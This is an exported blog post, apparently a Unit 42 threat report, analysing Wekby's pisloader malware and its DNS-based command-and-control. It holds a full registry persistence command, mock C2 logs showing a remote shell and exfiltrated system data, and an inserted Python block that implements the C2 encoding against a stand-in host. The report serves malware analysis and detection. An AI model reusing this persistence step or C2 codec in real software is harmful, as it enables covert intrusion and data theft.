{"id":1292,"date":"2016-05-24T18:30:30","date_gmt":"2016-05-24T18:30:30","guid":{"rendered":"https:\/\/www.paloaltonetworks.com\/blog\/?p=13911"},"modified":"2023-06-06T23:55:23","modified_gmt":"2023-06-06T23:55:23","slug":"new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism","status":"publish","type":"post","link":"https:\/\/ddi.mohflo.net\/index.php\/2016\/05\/24\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism\/","title":{"rendered":"New Wekby Attacks Use DNS Requests As Command and Control Mechanism"},"content":{"rendered":"<p>We have observed an attack led by the APT group Wekby targeting a US-based organization in recent weeks. Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. 
The group is known to adopt newly released exploits very shortly after they become available, as in the case of <a href=\"https:\/\/www.volexity.com\/blog\/?p=158\" target=\"_blank\" rel=\"noopener\">HackingTeam\u2019s Flash zero-day exploit<\/a>.<\/p>\n<p>The malware used by the Wekby group has ties to the <a href=\"https:\/\/www.zscaler.com\/blogs\/research\/chinese-cyber-espionage-apt-group-leveraging-recently-leaked-hacking-team-exploits-target-financial-services-firm\" target=\"_blank\" rel=\"noopener\">HTTPBrowser<\/a> malware family and uses DNS requests as its command and control mechanism. It also uses several obfuscation techniques to hinder analysis. Based on metadata seen in the discussed samples, Palo Alto Networks has named this malware family \u2018pisloader\u2019.<\/p>\n<h3>Infrastructure<\/h3>\n<p>The pisloader malware family was delivered via HTTP from the following URL. At the time of writing, this URL was still active.<\/p>\n<p><em>http:\/\/globalprint-us[.]com\/proxy_plugin.exe<\/em><\/p>\n<p>Other samples hosted on this domain include the following:<\/p>\n<p><em>http:\/\/globalprint-us[.]com\/proxy_web_plugin.exe<\/em><\/p>\n<p><strong>MD5:<\/strong> E4968C8060EA017B5E5756C16B80B012<br \/><strong>SHA256:<\/strong> 8FFBB7A80EFA9EE79E996ABDE7A95CF8DC6F9A41F9026672A8DBD95539FEA82A<br \/><strong>Size:<\/strong> 126976 Bytes<br \/><strong>Compile Time:<\/strong> 2016-04-28 00:38:46 UTC<\/p>\n<p>This second file is an instance of the widely used Poison Ivy malware family, with the following configuration data:<\/p>\n<p><strong>Command and Control Address:<\/strong> intranetwabcam[.]com<br \/><strong>Command and Control Port:<\/strong> 80<br \/><strong>Password:<\/strong> admin<br \/><strong>Mutex:<\/strong> )!VoqA.I5<\/p>\n<p>The domains witnessed in this attack were all registered very shortly before being used. 
The following domains have been witnessed in this attack:<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-1.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" decoding=\"async\" class=\"size-large wp-image-13914 aligncenter\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism.png?resize=500%2C67&#038;ssl=1\" alt=\"Wekby Targets 1\" width=\"500\" height=\"67\"><\/a><\/p>\n<p>Additionally, the following IP resolutions have been observed.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-1.2.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"size-large wp-image-13917 aligncenter\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-1.png?resize=500%2C65&#038;ssl=1\" alt=\"Wekby Targets 1.2\" width=\"500\" height=\"65\"><\/a><\/p>\n<h3>Initial Dropper<\/h3>\n<p>The following sample was discovered initially and is referenced in the subsequent analysis:<\/p>\n<p><strong>MD5:<\/strong> E8D58AA76DD97536AC225949A2767E05<br \/><strong>SHA256:<\/strong> DA3261C332E72E4C1641CA0DE439AF280E064B224D950817A11922A8078B11F1<br \/><strong>Size:<\/strong> 126976 Bytes<br \/><strong>Compile Time:<\/strong> 2016-04-27 14:37:34 UTC<\/p>\n<p>This particular file has the following metadata properties. 
The references to \u2018pisload2\u2019 led to the naming of this malware family.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-2.png?ssl=1\" rel=\"wpdevart_lightbox\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" loading=\"lazy\" class=\"size-large wp-image-13929 aligncenter\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-2.png?resize=500%2C622&#038;ssl=1\" alt=\"Wekby Targets 2\" width=\"500\" height=\"622\"><\/a><\/p>\n<p><em>Figure 1 pisloader dropper metadata<\/em><\/p>\n<p>The initial dropper contains very simple code that is responsible for setting persistence via the Run registry key, and dropping and executing an embedded Windows executable. Limited obfuscation was encountered, where the authors split up strings into smaller sub-strings and used \u2018strcpy\u2019 and \u2018strcat\u2019 calls to re-build them prior to use. They also used this same technique to generate garbage strings that are never used. This is likely to deter detection and analysis of the sample. The following decompiled code demonstrates this. 
Comments have been added to show the fully-generated strings.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-3.png?ssl=1\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-13923\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-3.png?resize=500%2C132&#038;ssl=1\" alt=\"Wekby Targets 3\" width=\"500\" height=\"132\"><\/a><\/p>\n<p><em>Figure 2 pisloader dropper building strings and setting persistence<\/em><\/p>\n<p>In the decompiled code above, pisloader assembles the following command line, which is then executed to set the Run registry key.<\/p>\n<p><em>cmd.exe \/c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v lsm \/t reg_sz \/d \"%appdata%\\lsm.exe\" \/f<\/em><\/p>\n<p>This command creates a value named \u2018lsm\u2019 under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run with the data \u201c%appdata%\\lsm.exe\u201d, so the payload is launched at every logon of the current user. Once the key is set, the malware decrypts two blobs of data with a single-byte XOR key of 0x54 and writes the result to %appdata%\\lsm.exe.<\/p>\n<p>The malware then executes the newly written lsm.exe, which contains the pisloader payload.<\/p>\n<h3>Payload<\/h3>\n<p>The following sample was discovered and is referenced in the subsequent analysis:<\/p>\n<p><strong>MD5:<\/strong> 07B9B62FB3B1C068837C188FEFBD5DE9<br \/><strong>SHA256:<\/strong> 456FFFC256422AD667CA023D694494881BAED1496A3067485D56ECC8FEFBFAEB<br \/><strong>Size:<\/strong> 102400 Bytes<br \/><strong>Compile Timestamp:<\/strong> 2016-04-27 13:39:02 UTC<\/p>\n<p>The payload is heavily obfuscated with a return-oriented programming (ROP) style technique and a large number of garbage assembly instructions. 
In the example below, the code highlighted in red serves no purpose other than to deter reverse engineering of the sample; it can be treated as garbage and ignored. The real body of the function is highlighted in green: two function offsets are pushed onto the stack, followed by a return instruction. That return first transfers execution to the null function, which in turn returns into \u2018next_function\u2019. This technique is used throughout the payload, making static analysis difficult.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-4.png?ssl=1\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-13926\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-4.png?resize=279%2C805&#038;ssl=1\" alt=\"Wekby Targets 4\" width=\"279\" height=\"805\"><\/a><\/p>\n<p><em>Figure 3 Obfuscated code witnessed in pisloader<\/em><\/p>\n<p>Once the obfuscation and garbage code are ignored, the malware is actually quite simple. It begins by generating a random 10-byte alphanumeric header; the data to be sent follows, base32-encoded with the padding removed. The result is used as a subdomain in a subsequent DNS request for a TXT record.<\/p>\n<p>The use of DNS as a C2 protocol has historically not been widely adopted by malware authors. 
Notable exceptions include the following:<\/p>\n<p>Using DNS as the C2 channel allows pisloader to bypass security products that may not inspect this traffic correctly.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-5.png?ssl=1\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-13932\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-5.png?resize=500%2C278&#038;ssl=1\" alt=\"Wekby Targets 5\" width=\"500\" height=\"278\"><\/a><\/p>\n<p><em>Figure 4 DNS query for TXT record by malware<\/em><\/p>\n<p>pisloader periodically sends a beacon whose payload is a random 4-byte uppercase string. An example is shown below:<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-6.png?ssl=1\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-13935\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-6.png?resize=500%2C130&#038;ssl=1\" alt=\"Wekby Targets 6\" width=\"500\" height=\"130\"><\/a><\/p>\n<p><em>Figure 5 pisloader DNS beacon request<\/em><\/p>\n<p>The malware expects several fields of the DNS response to be set in a specific way and ignores any reply that does not comply. The following flags must be set, and no others; a response with any additional flag set is discarded.<\/p>\n<ul>\n<li>Response<\/li>\n<li>Recursion Desired<\/li>\n<li>Recursion Available<\/li>\n<\/ul>\n<p>The \u2018Questions\u2019 field must be set to a value of 0x1. 
The \u2018Answer Resource Records\u2019 field must be set to a value of 0x1. Additionally, the question name echoed in the response must match the original DNS request.<\/p>\n<p>The remote command and control (C2) server is statically embedded within the malware; this specific sample contains a single host, \u2018ns1.logitech-usa[.]com\u2019.<\/p>\n<p>The C2 server responds with a TXT record encoded similarly to the request: the first byte is ignored, and the remaining data is base32-encoded. An example is shown below.<\/p>\n<p><a href=\"https:\/\/i0.wp.com\/blog.paloaltonetworks.com\/wp-content\/uploads\/2016\/05\/Wekby-Targets-7-.png?ssl=1\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-13938\" src=\"https:\/\/i0.wp.com\/ddi.mohflo.net\/wp-content\/uploads\/2023\/06\/new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism-7.png?resize=500%2C177&#038;ssl=1\" alt=\"Wekby Targets 7\" width=\"500\" height=\"177\"><\/a><\/p>\n<p><em>Figure 6 Example TXT response by C2 server<\/em><\/p>\n<p>The malware supports the following commands:<\/p>\n<ul>\n<li>sifo \u2013 Collect victim system information<\/li>\n<li>drive \u2013 List drives on the victim machine<\/li>\n<li>list \u2013 List file information for the provided directory<\/li>\n<li>upload \u2013 Upload a file to the victim machine<\/li>\n<li>open \u2013 Spawn a command shell<\/li>\n<\/ul>\n<p>Some examples of these commands being used can be seen below. 
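<p>As an added example (not code from pisloader or from the original analysis), the following Python implements the encoding scheme described above and the response filter the client applies, using the captured labels and TXT bodies from the exchanges below as test vectors. Assumptions that go beyond the write-up: the 10-character header is treated as opaque and is generated here from uppercase letters and digits; chunks of a multi-part reply are joined in the order received; the C2 host is a stand-in rather than the sample\u2019s real one; and the DNS messages are built by hand from the RFC 1035 wire format.<\/p>

```python
# Added example for this page: a codec and response filter for the pisloader
# DNS C2 scheme described in the write-up. Not pisloader's own code, nor code
# from the original analysis. Assumptions not taken from the write-up: the
# 10-character header is opaque and drawn from uppercase letters and digits;
# multi-part replies are concatenated in arrival order; the C2 host is a stand-in.
import base64
import secrets
import string
import struct

C2_HOST = "ns1.example.invalid"  # stand-in; the sample embeds ns1.logitech-usa[.]com
HEADER_LEN = 10                  # random alphanumeric header on each outbound label
FLAGS_ACCEPTED = 0x8180          # QR | RD | RA and nothing else, per the write-up
QTYPE_TXT, QCLASS_IN = 16, 1

def b32_nopad(data: bytes) -> str:
    """Base32 with the '=' padding stripped, as pisloader places it in a label."""
    return base64.b32encode(data).decode("ascii").rstrip("=")

def b32_unpad_decode(text: str) -> bytes:
    """Restore padding to a multiple of eight characters, then decode."""
    return base64.b32decode(text + "=" * (-len(text) % 8))

def build_query_name(payload: bytes, header: str = "") -> str:
    """Client side: <header><base32(payload)>.<C2 host>, queried as a TXT record."""
    if not header:  # constructed header; the malware's own generator is not documented
        alphabet = string.ascii_uppercase + string.digits
        header = "".join(secrets.choice(alphabet) for _ in range(HEADER_LEN))
    return f"{header}{b32_nopad(payload)}.{C2_HOST}"

def decode_client_chunk(label: str) -> bytes:
    """Server side: drop the 10-character header and decode what remains."""
    return b32_unpad_decode(label[HEADER_LEN:])

def reassemble(labels) -> bytes:
    """Join the decoded chunks of one reply in arrival order (an assumption)."""
    return b"".join(decode_client_chunk(label) for label in labels)

def encode_command(cmd: str, ignored_byte: str = "C") -> str:
    """TXT record body: one byte the client skips, then unpadded base32 of the command."""
    return ignored_byte + b32_nopad(cmd.encode("ascii"))

def decode_command(txt: str) -> str:
    """Client side: skip the first byte, decode the rest."""
    return b32_unpad_decode(txt[1:]).decode("ascii")

def _wire_name(name: str) -> bytes:
    """RFC 1035 label encoding of a dotted name."""
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in name.split(".")) + b"\x00"

def _read_name(msg: bytes, off: int):
    """Parse an uncompressed name at msg[off:]; return (name, offset after it)."""
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointer in question section")
        labels.append(msg[off:off + n].decode("ascii"))
        off += n

def build_txt_response(qname: str, txt: str, flags: int = FLAGS_ACCEPTED, txid: int = 0x1234) -> bytes:
    """Constructed response: one question and one TXT answer for qname."""
    header = struct.pack("!6H", txid, flags, 1, 1, 0, 0)  # QDCOUNT=1, ANCOUNT=1
    question = _wire_name(qname) + struct.pack("!HH", QTYPE_TXT, QCLASS_IN)
    rdata = bytes([len(txt)]) + txt.encode("ascii")       # a single character-string
    answer = _wire_name(qname) + struct.pack("!HHIH", QTYPE_TXT, QCLASS_IN, 60, len(rdata)) + rdata
    return header + question + answer

def pisloader_accepts(response: bytes, sent_qname: str) -> bool:
    """The acceptance rules listed above: flags exactly QR|RD|RA, QDCOUNT == 1,
    ANCOUNT == 1, and the echoed question name equal to the name the client sent."""
    if len(response) < 12:
        return False
    _txid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!6H", response[:12])
    if flags != FLAGS_ACCEPTED or qdcount != 1 or ancount != 1:
        return False
    try:
        qname, _ = _read_name(response, 12)
    except (ValueError, IndexError):
        return False
    return qname.lower() == sent_qname.lower()

if __name__ == "__main__":
    # Round trip built from the 'drive' exchange captured below.
    sent = build_query_name(b"A:\\|C:\\|D:\\|", header="UMAVMGAGD0")
    print(sent, "->", decode_client_chunk(sent.split(".")[0]))
    reply = build_txt_response(sent, encode_command("drive"))
    print(pisloader_accepts(reply, sent), decode_command(encode_command("drive")))
    # The same answer with AA also set (flags 0x8580) fails the flag check.
    print(pisloader_accepts(build_txt_response(sent, encode_command("drive"), flags=0x8580), sent))
```

<p>The filter is strict by construction: a reply relayed by a recursive resolver normally carries exactly QR, RD and RA (0x8180), while an answer with any further flag set, for example AA from an authoritative server queried directly, fails the check and is dropped, as are replies whose question name differs from the label the client sent.<\/p>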
A mock DNS server was used to generate the commands and receive the resulting data.<\/p>\n<p><strong>Example sending the \u2018drive\u2019 command:<\/strong><\/p>\n<pre>[+] Sending Command: drive | Encoded: CMRZGS5TF\n[+] Raw Data Received: UMAVMGAGD0IE5FY7CDHJOHYRB2LR6A\n[+] Decoded Data Received: A:\\|C:\\|D:\\|<\/pre>\n<p><strong>Example sending the \u2018open\u2019 command:<\/strong><\/p>\n<pre>[+] Sending Command: open | Encoded: CN5YGK3Q\n[+] Raw Data Received: ULCBMGAGCAJVUWG4TPONXWM5BAK5UW4ZDPO5ZSAW2WMVZHG2LP\n[+] Raw Data Received: ATABMGAGCBNYQDMLRRFY3TMMBRLUGQUQ3POB4XE2LHNB2CAKDD\n[+] Raw Data Received: HTPDMGAGCCFEQDEMBQHEQE22LDOJXXG33GOQQEG33SOBXXEYLU\n[+] Raw Data Received: BNJWMGAGCDNFXW4LRAEBAWY3BAOJUWO2DUOMQHEZLTMVZHMZLE\n[+] Raw Data Received: UARCMGAGCEFYGQUDIKIM5FYVLTMVZHGXCKN5ZWQICHOJ2W46TX\n[+] Raw Data Received: UJRAMGAGC0MVUWOXCEMVZWW5DPOA7A\n[+] Decoded Data Received: Microsoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\nC:\\Users\\Josh Grunzweig\\Desktop&gt;<\/pre>\n<p><strong>Example sending the \u2018sifo\u2019 command:<\/strong><\/p>\n<pre>[+] Sending Command: sifo | Encoded: CONUWM3Y\n[+] Raw Data Received: FUBWMGAGIANQ6TCNZSFYYTMLRRFYYTKMZGMM6VOSKOFVGEUTCW\n[+] Raw Data Received: PGHRMGAGIBGJHEWSKPJNICAW2KN5ZWQICHOJ2W46TXMVUWOXJG\n[+] Raw Data Received: MMAZMGAGI0N46TMLBRFQZTE\n[+] Decoded Data Received: l=172.16.1.153&amp;c=WIN-LJLV2NKIOKP [Josh Grunzweig]&amp;o=6,1,32<\/pre>\n<p><strong>Example listing the contents of the C:\\ drive:<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta --> <\/p>\n<div id=\"crayon-647fb69c793b9651248932\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" readability=\"10\">\n<p><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly><br \/>\n[+] Sending Command: list C:\\ | Encoded: CNRUXG5BAIM5FY<br 
\/>\n[+] Raw Data Received: QKTUMGAGLAGB6CIUTFMN4WG3DFFZBGS3T4GIYDCNJPGAZS6MRW<br \/>\n[+] Raw Data Received: EKNPMGAGL0EAYTIORUGA5DKN34GB6DEMS6<br \/>\n[+] Raw Data Received: RKMAMGAGLAGF6GC5LUN5SXQZLDFZRGC5D4GIYDAOJPGA3C6MJQ<br \/>\n[+] Raw Data Received: NMSIMGAGL0EAZDCORUGI5DEMD4GI2HYMZSLY<br \/>\n[+] Raw Data Received: OHRWMGAGLAGB6EE33POR6DEMBRGUXTAMZPGI3CAMJWHIZDIORQ<br \/>\n[+] Raw Data Received: DPDUMGAGL0GJ6DA7BSGJPA<br \/>\n[+] Raw Data Received: WIKGMGAGLAGF6GE33PORWWO4T4GIYDCNBPGA3C6MRYEAYDAORS<br \/>\n* Truncated*<br \/>\n[+] Decoded Data Received: 0|$Recycle.Bin|2015\/03\/26 14:40:57|0|22^1|autoexec.bat|2009\/06\/10 21:42:20|24|32^0|Boot|2015\/03\/26 16:24:02|0|22^1|bootmgr|2014\/06\/28 00:21:34|391640|39^1|BOOTSECT.BAK|2015\/03\/26 16:35:39|8192|39^1|config.sys|2009\/06\/10 21:42:20|10|32^0|Documents and Settings|2009\/07\/14 04:53:55|0|9238^1|Example.log|2016\/02\/09 20:17:55|0|32^1|pagefile.sys|2016\/04\/25 14:09:20|1660411904|38^0|PerfLogs|2009\/07\/14 02:37:05|0|16^0|Program Files|2016\/02\/29 15:59:43|0|17^0|ProgramData|2016\/02\/02 17:28:04|0|8210^0|Python27|2016\/02\/25 16:39:37|0|16^0|Recovery|2015\/03\/26 14:39:57|0|8214^0|System Volume Information|2016\/02\/29 16:00:19|0|22^0|Users|2015\/03\/26 14:39:58|0|17^0|Windows|2016\/02\/12 10:20:21|0|16^^end^<\/textarea><\/p>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\" readability=\"2.5\">\n<tr class=\"crayon-row\" readability=\"5\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<p>1<\/p>\n<p>2<\/p>\n<p>3<\/p>\n<p>4<\/p>\n<p>5<\/p>\n<p>6<\/p>\n<p>7<\/p>\n<p>8<\/p>\n<p>9<\/p>\n<p>10<\/p>\n<\/div>\n<\/td>\n<td class=\"crayon-code\" readability=\"13.5\">\n<div class=\"crayon-pre\" readability=\"26\">\n<p><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sending <\/span><span class=\"crayon-v\">Command<\/span><span 
class=\"crayon-o\">:<\/span> list C:\\ | Encoded: CNRUXG5BAIM5FY<\/p>\n<p>[+] Raw Data Received: QKTUMGAGLAGB6CIUTFMN4WG3DFFZBGS3T4GIYDCNJPGAZS6MRW<\/p>\n<p>[+] Raw Data Received: EKNPMGAGL0EAYTIORUGA5DKN34GB6DEMS6<\/p>\n<p>[+] Raw Data Received: RKMAMGAGLAGF6GC5LUN5SXQZLDFZRGC5D4GIYDAOJPGA3C6MJQ<\/p>\n<p>[+] Raw Data Received: NMSIMGAGL0EAZDCORUGI5DEMD4GI2HYMZSLY<\/p>\n<p>[+] Raw Data Received: OHRWMGAGLAGB6EE33POR6DEMBRGUXTAMZPGI3CAMJWHIZDIORQ<\/p>\n<p>[+] Raw Data Received: DPDUMGAGL0GJ6DA7BSGJPA<\/p>\n<p>[+] Raw Data Received: WIKGMGAGLAGF6GE33PORWWO4T4GIYDCNBPGA3C6MRYEAYDAORS<\/p>\n<p>*Truncated*<\/p>\n<p>[+] Decoded Data Received: 0|$Recycle.Bin|2015\/03\/26 14:40:57|0|22^1|autoexec.bat|2009\/06\/10 21:42:20|24|32^0|Boot|2015\/03\/26 16:24:02|0|22^1|bootmgr|2014\/06\/28 00:21:34|391640|39^1|BOOTSECT.BAK|2015\/03\/26 16:35:39|8192|39^1|config.sys|2009\/06\/10 21:42:20|10|32^0|Documents and Settings|2009\/07\/14 04:53:55|0|9238^1|Example.log|2016\/02\/09 20:17:55|0|32^1|pagefile.sys|2016\/04\/25 14:09:20|1660411904|38^0|PerfLogs|2009\/07\/14 02:37:05|0|16^0|Program Files|2016\/02\/29 15:59:43|0|17^0|ProgramData|2016\/02\/02 17:28:04|0|8210^0|Python27|2016\/02\/25 16:39:37|0|16^0|Recovery|2015\/03\/26 14:39:57|0|8214^0|System Volume Information|2016\/02\/29 16:00:19|0|22^0|Users|2015\/03\/26 14:39:58|0|17^0|Windows|2016\/02\/12 10:20:21|0|16^^end^<\/p>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>The sifo command above uses the printf format string of \u2018l=%s&amp;c=%s&amp;o=%s\u2019. This is consistent with previous versions of HTTPBrowser, which is another malware family frequently used by the Wekby group.<\/p>\n<p>Additionally, a number of the commands themselves, such as \u2018list\u2019, \u2018drive\u2019, and \u2018upload\u2019, are consistent with HTTPBrowser. The formatted responses from these commands are also identical. 
A <a href=\"https:\/\/www.virustotal.com\/en\/file\/9995fe6ff112efb6de6498ace23f42b8d3689f3c890959728cbc888462b9ea0d\/analysis\/\" target=\"_blank\" rel=\"noopener\">known HTTPBrowser sample<\/a> was spotted with metadata similar to that of the discussed pisloader sample, which lends further credibility to the assessment that pisloader is likely a variant of this malware family.<\/p>\n<p>Additionally, the code used to generate these commands is available via <a href=\"https:\/\/github.com\/pan-unit42\/public_tools\/tree\/master\/pisloader\/wekby_dns.py\" target=\"_blank\" rel=\"noopener\">GitHub<\/a>.<\/p>\n<h3>Conclusion<\/h3>\n<p>The Wekby group continues to target various high-profile organizations using sophisticated malware. The pisloader malware family uses various novel techniques, such as using DNS as a C2 protocol, as well as making use of return-oriented programming and other anti-analysis tactics.<\/p>\n<p>Palo Alto Networks customers are protected against this threat in the following ways:<\/p>\n<ul>\n<li>WildFire correctly identifies all pisloader samples as malicious.<\/li>\n<li>A <a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.Pisloader\" target=\"_blank\" rel=\"noopener\">pisloader AutoFocus tag<\/a> has been created in order to track this malware family.<\/li>\n<li>All domains\/IPs used in this attack have been flagged as malicious.<\/li>\n<li>An IPS rule has been created to detect pisloader DNS traffic.<\/li>\n<\/ul>\n<h3>Appendix<\/h3>\n<p><strong>External Resources<\/strong><\/p>\n<p><strong>SHA256 Hashes<\/strong><\/p>\n<p><strong>Domains<\/strong><\/p>\n<p>ns1.logitech-usa[.]com<br \/>globalprint-us[.]com<br \/>intranetwabcam[.]com<br \/>login.access-mail[.]com<br \/>glb.it-desktop[.]com<br \/>local.it-desktop[.]com<br \/>hi.getgo2[.]com<\/p>\n<p> <a href=\"https:\/\/www.paloaltonetworks.com\/blog\/2016\/05\/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism\/\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post is also available in: \u65e5\u672c\u8a9e (Japanese) We have<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[203,30,168,204,202,183,205],"tags":[208,38,169,209,206,207,210],"class_list":["post-1292","post","type-post","status-publish","format-standard","hentry","category-command-and-control","category-dns","category-malware","category-pisloader","category-threat-prevention","category-unit-42","category-wekby","tag-command-and-control","tag-dns","tag-malware","tag-pisloader","tag-threat-prevention","tag-unit-42","tag-wekby"],"featured_image_urls":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":"","chromenews-featured":"","chromenews-large":"","chromenews-medium":""},"author_info":{"display_name":"Palo 
Alto","author_link":"https:\/\/ddi.mohflo.net\/index.php\/author\/paloalto\/"},"category_info":"<a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/command-and-control\/\" rel=\"category tag\">command and control<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/dns\/\" rel=\"category tag\">DNS<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/malware\/\" rel=\"category tag\">Malware<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/pisloader\/\" rel=\"category tag\">pisloader<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/threat-prevention\/\" rel=\"category tag\">Threat Prevention<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/unit-42\/\" rel=\"category tag\">Unit 42<\/a> <a href=\"https:\/\/ddi.mohflo.net\/index.php\/category\/wekby\/\" rel=\"category tag\">Wekby<\/a>","tag_info":"Wekby","comment_count":"0","jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts\/1292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/comments?post=1292"}],"version-history":[{"count":1,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts\/1292\/revisions"}],"predecessor-version":[{"id":1390,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/posts\/1292\/revisions\/1390"}],"wp:attachment":[{"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/media?parent=1292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/categories?post=1292"},{"taxonomy":"post_tag","embeddable":true,"
href":"https:\/\/ddi.mohflo.net\/index.php\/wp-json\/wp\/v2\/tags?post=1292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}